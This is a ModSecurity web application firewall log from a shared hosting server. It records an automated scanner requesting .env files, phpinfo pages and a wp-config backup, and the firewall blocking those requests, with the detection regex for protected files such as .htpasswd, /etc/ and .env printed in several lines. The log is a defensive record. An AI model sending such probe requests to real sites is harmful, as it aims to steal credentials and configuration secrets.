[Tue May 26 14:49:53.198888 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:16946] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwkAAAAL4"]
[Tue May 26 14:49:53.256259 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwmAAAAO8"]
[Tue May 26 14:49:53.260278 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwmwAAAMs"]
[Tue May 26 14:49:53.309365 2026] [security2:error] [pid 648203:tid 648366] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVluLEQDDtxJNiDrdTwbQAAAKY"]
[Tue May 26 14:49:53.335239 2026] [security2:error] [pid 648203:tid 648456] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwoAAAAQA"]
[Tue May 26 14:49:53.340704 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwowAAAPY"]
[Tue May 26 14:49:53.354755 2026] [security2:error] [pid 648203:tid 648411] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwpAAAANM"]
[Tue May 26 14:49:53.439659 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:16832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwsAAAAJ0"]
[Tue May 26 14:49:53.475350 2026] [security2:error] [pid 648203:tid 648353] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwswAAAJk"]
[Tue May 26 14:49:53.508696 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:16908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVlubEQDDtxJNiDrdTwwQAAAN8"]
[Tue May 26 14:49:53.512558 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwuAAAAQI"]
[Tue May 26 14:49:53.514032 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwvAAAALs"]
[Tue May 26 14:49:53.528285 2026] [security2:error] [pid 648203:tid 648414] [client 45.148.10.95:16670] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwvQAAANY"]
[Tue May 26 14:49:53.543246 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:16922] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwvgAAANs"]
[Tue May 26 14:49:53.570209 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwwgAAAMg"]
[Tue May 26 14:49:53.605820 2026] [security2:error] [pid 648203:tid 648432] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwxQAAAOg"]
[Tue May 26 14:49:53.626124 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:16946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVlubEQDDtxJNiDrdTwyAAAANk"]
[Tue May 26 14:49:53.644257 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:16832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwxwAAAN0"]
[Tue May 26 14:49:53.644343 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:16972] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwxgAAAOo"]
[Tue May 26 14:49:53.659595 2026] [security2:error] [pid 648203:tid 648415] [client 45.148.10.95:16894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVlubEQDDtxJNiDrdTwygAAANc"]
[Tue May 26 14:49:53.660867 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:16882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api-backend/.env"] [unique_id "ahVlubEQDDtxJNiDrdTwywAAALY"]
[Tue May 26 14:49:53.700847 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:16936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/admin-app/.env"] [unique_id "ahVlubEQDDtxJNiDrdTw0AAAALc"]
[Tue May 26 14:49:53.747316 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTwzgAAAIs"]
[Tue May 26 14:49:53.816248 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTw0wAAAL4"]
[Tue May 26 14:49:53.856647 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:16852] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTw1AAAAJs"]
[Tue May 26 14:49:53.920526 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:16936] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTw1wAAALw"]
[Tue May 26 14:49:53.929372 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:16882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/administrator/.env"] [unique_id "ahVlubEQDDtxJNiDrdTw3QAAAPM"]
[Tue May 26 14:49:53.964848 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:16922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api-node/.env"] [unique_id "ahVlubEQDDtxJNiDrdTw3wAAAKY"]
[Tue May 26 14:49:53.991506 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:16970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTw3gAAAPw"]
[Tue May 26 14:49:54.041364 2026] [security2:error] [pid 648203:tid 648455] [client 45.148.10.95:16792] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlubEQDDtxJNiDrdTw4QAAAP8"]
[Tue May 26 14:49:54.110888 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:16990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api/info.php"] [unique_id "ahVlurEQDDtxJNiDrdTw5wAAAOw"]
[Tue May 26 14:49:54.138900 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:17002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api/.env"] [unique_id "ahVlurEQDDtxJNiDrdTw6AAAAJg"]
[Tue May 26 14:49:54.140672 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:16882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw5AAAAJQ"]
[Tue May 26 14:49:54.152832 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:16988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw5gAAAJw"]
[Tue May 26 14:49:54.258536 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:17040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw6QAAAIw"]
[Tue May 26 14:49:54.280774 2026] [security2:error] [pid 648203:tid 648389] [client 45.148.10.95:17020] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw6gAAAL0"]
[Tue May 26 14:49:54.353198 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw8wAAAI4"]
[Tue May 26 14:49:54.400194 2026] [security2:error] [pid 648203:tid 648353] [client 45.148.10.95:16922] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw9AAAAJk"]
[Tue May 26 14:49:54.406993 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:17078] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw-QAAAKM"]
[Tue May 26 14:49:54.417512 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.5:30936] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.save"] [unique_id "ahVlurEQDDtxJNiDrdTxBAAAANI"]
[Tue May 26 14:49:54.418661 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:16792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/api/phpinfo.php"] [unique_id "ahVlurEQDDtxJNiDrdTxBgAAAQQ"]
[Tue May 26 14:49:54.424220 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw-wAAAPc"]
[Tue May 26 14:49:54.431052 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw_QAAAQI"]
[Tue May 26 14:49:54.439368 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:16970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTw_gAAAM8"]
[Tue May 26 14:49:54.492728 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:17036] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxBwAAAPk"]
[Tue May 26 14:49:54.503226 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:17112] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxDAAAAJ8"]
[Tue May 26 14:49:54.510294 2026] [security2:error] [pid 648203:tid 648415] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxEQAAANc"]
[Tue May 26 14:49:54.512605 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxDwAAAOo"]
[Tue May 26 14:49:54.627033 2026] [security2:error] [pid 648203:tid 648412] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxGQAAANQ"]
[Tue May 26 14:49:54.641106 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:16670] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxGgAAAL8"]
[Tue May 26 14:49:54.716023 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxIAAAAPA"]
[Tue May 26 14:49:54.814747 2026] [security2:error] [pid 648203:tid 648350] [client 45.148.10.95:17120] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxIQAAAJY"]
[Tue May 26 14:49:54.844441 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxKQAAAPM"]
[Tue May 26 14:49:54.851759 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:16922] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxKgAAAKY"]
[Tue May 26 14:49:54.854579 2026] [security2:error] [pid 648203:tid 648379] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxLQAAALM"]
[Tue May 26 14:49:54.864541 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxMwAAAJg"]
[Tue May 26 14:49:54.866751 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxMAAAAMI"]
[Tue May 26 14:49:54.881079 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxNgAAANE"]
[Tue May 26 14:49:54.881446 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxOQAAAMs"]
[Tue May 26 14:49:54.897095 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:17070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/apis/.env"] [unique_id "ahVlurEQDDtxJNiDrdTxQAAAAO0"]
[Tue May 26 14:49:54.898587 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxPAAAAI0"]
[Tue May 26 14:49:54.912433 2026] [security2:error] [pid 648203:tid 648457] [client 74.249.173.207:27847] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/index/function.php"] [unique_id "ahVlurEQDDtxJNiDrdTxQgAAAQE"]
[Tue May 26 14:49:54.947551 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxPwAAAI4"]
[Tue May 26 14:49:54.954104 2026] [security2:error] [pid 648203:tid 648459] [client 216.26.248.221:33789] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlubEQDDtxJNiDrdTw2QAAAQM"], referer: https://velanstore.ca/wp-login.php
